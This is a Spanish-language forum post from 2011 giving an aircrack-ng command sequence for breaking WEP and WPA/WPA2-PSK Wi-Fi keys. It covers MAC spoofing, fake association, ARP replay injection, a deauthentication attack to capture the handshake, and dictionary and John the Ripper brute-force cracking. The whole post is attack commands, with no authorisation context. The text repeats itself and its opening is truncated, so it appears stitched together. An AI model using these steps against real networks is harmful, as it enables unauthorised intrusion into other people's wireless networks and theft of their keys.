Sáb Jul 09, 2011 3:59 pm
1. WEP`s:
NOTA: En todos los casos reemplazar:
XXXX: Interface
ZZZZ: Canal
YYYY: MAC BSSID
RRR: ESSID
1.1. Cambiar la MAC:
A. airmon-ng (Ver la interface que usamos)
B. airmon-ng stop XXXX (Detenemos el modo monitor)
C. ifconfig XXXX down (Tiramos nuestra interface)
D. macchanger --mac 00:11:22:33:44:55 XXXX (Cambiamos nuestra MAC, en este caso sera 00:11:22:33:44:55)
E. airmon-ng start XXXX (Volvemos a iniciar el modo monitor)
1.2. Buscar Redes:
F. airodump-ng XXXX ( Scannea Redes)
G. CTRL + C (Detiene el scanneo)
H. airodump-ng -c ZZZZ -w datas --bssid YYYY XXXX (Capturamos #DATAs) [No cerrar consola]
1.3. Asociandonos a la red (En otra consola):
I. aireplay-ng -1 0 -a YYYY -h 00:11:22:33:44:55 -e RRR XXXX (Asociacion con la red)
1.4 Inyectando Trafico:
J. aireplay-ng -3 -b YYYY -h 00:11:22:33:44:55 XXXX (Captura Datas a mas velocidad)
1.5. Desencriptando la Clave (En otra consola):
K. aircrack-ng datas-01.cap (Desencripta la clave con Aircrack)
2. WPA/WPA2/PSK:
NOTA: En todos los casos reemplazar:XXXX: Interface
ZZZZ: Canal
YYYY: MAC BSSID
RRR: Interface modo monitor
TTTT: Station
2.1. Colocar la interface en modo monitor
A. aimon-ng (Saber nuestra Interface)
B. airmon-ng start XXXX (Colocamos en modo monitor nuestra Interface)
2.2. Capturando el Handshake:
C. airodump-ng RRR (Scannea redes)
D. CTRL + C (Frena el scanneo)
E. airodump-ng RRR --channel 1 --bssid YYYY -w /tmp/wpa2 (Guardara los *.cap en el directorio que le indicamos)
F. aireplay-ng -0 1 -a YYYY -c TTTT RRR(Comenzara la captura del Handshake)
2.3 Obteniendo la Clave:
G.1. aircrack-ng -w /pentest/passwords/wordlists/wpa.txt -b YYYY /tmp/wpa2*.cap (Saca la Pass por Diccionario)
G.2. /pentest/password/jtr/john --stdout --incremental:all | aircrack-ng -b YYYY -w - /tmp/wpa2*.cap (Saca la Pass por Fuerza Bruta con John The Ripper)
NOTA: En todos los casos reemplazar:
XXXX: Interface
ZZZZ: Canal
YYYY: MAC BSSID
RRR: ESSID
1.1. Cambiar la MAC:
A. airmon-ng (Ver la interface que usamos)
B. airmon-ng stop XXXX (Detenemos el modo monitor)
C. ifconfig XXXX down (Tiramos nuestra interface)
D. macchanger --mac 00:11:22:33:44:55 XXXX (Cambiamos nuestra MAC, en este caso sera 00:11:22:33:44:55)
E. airmon-ng start XXXX (Volvemos a iniciar el modo monitor)
1.2. Buscar Redes:
F. airodump-ng XXXX ( Scannea Redes)
G. CTRL + C (Detiene el scanneo)
H. airodump-ng -c ZZZZ -w datas --bssid YYYY XXXX (Capturamos #DATAs) [No cerrar consola]
1.3. Asociandonos a la red (En otra consola):
I. aireplay-ng -1 0 -a YYYY -h 00:11:22:33:44:55 -e RRR XXXX (Asociacion con la red)
1.4 Inyectando Trafico:
J. aireplay-ng -3 -b YYYY -h 00:11:22:33:44:55 XXXX (Captura Datas a mas velocidad)
1.5. Desencriptando la Clave (En otra consola):
K. aircrack-ng datas-01.cap (Desencripta la clave con Aircrack)
2. WPA/WPA2/PSK:
NOTA: En todos los casos reemplazar:XXXX: Interface
ZZZZ: Canal
YYYY: MAC BSSID
RRR: Interface modo monitor
TTTT: Station
2.1. Colocar la interface en modo monitor
A. aimon-ng (Saber nuestra Interface)
B. airmon-ng start XXXX (Colocamos en modo monitor nuestra Interface)
2.2. Capturando el Handshake:
C. airodump-ng RRR (Scannea redes)
D. CTRL + C (Frena el scanneo)
E. airodump-ng RRR --channel 1 --bssid YYYY -w /tmp/wpa2 (Guardara los *.cap en el directorio que le indicamos)
F. aireplay-ng -0 1 -a YYYY -c TTTT RRR(Comenzara la captura del Handshake)
2.3 Obteniendo la Clave:
G.1. aircrack-ng -w /pentest/passwords/wordlists/wpa.txt -b YYYY /tmp/wpa2*.cap (Saca la Pass por Diccionario)
G.2. /pentest/password/jtr/john --stdout --incremental:all | aircrack-ng -b YYYY -w - /tmp/wpa2*.cap (Saca la Pass por Fuerza Bruta con John The Ripper)
- Código:
Gracias Antrax